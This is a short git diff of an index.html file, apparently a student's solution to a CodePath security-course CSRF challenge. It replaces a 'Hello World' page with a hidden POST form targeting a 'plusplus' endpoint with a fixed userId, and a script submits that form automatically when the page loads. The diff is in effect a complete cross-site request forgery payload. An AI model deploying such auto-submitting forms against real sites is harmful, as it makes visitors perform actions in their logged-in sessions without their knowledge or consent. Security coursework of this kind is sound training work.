--- a/index.html
+++ b/index.html
@@ -1,6 +1,11 @@
+<!DOCTYPE html>
 <html>
-  <header>
     <body>
-      Hello World
+      <form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
+	<input type="hidden" name="userId" value="90d304a3e7bcdf0973ec9d81965b0c73666fde80" />
+	<input type="submit" />
+</form>
+"Thank you "
+<script> document.csrfForm.submit(); </script>
     <body>
 </html>
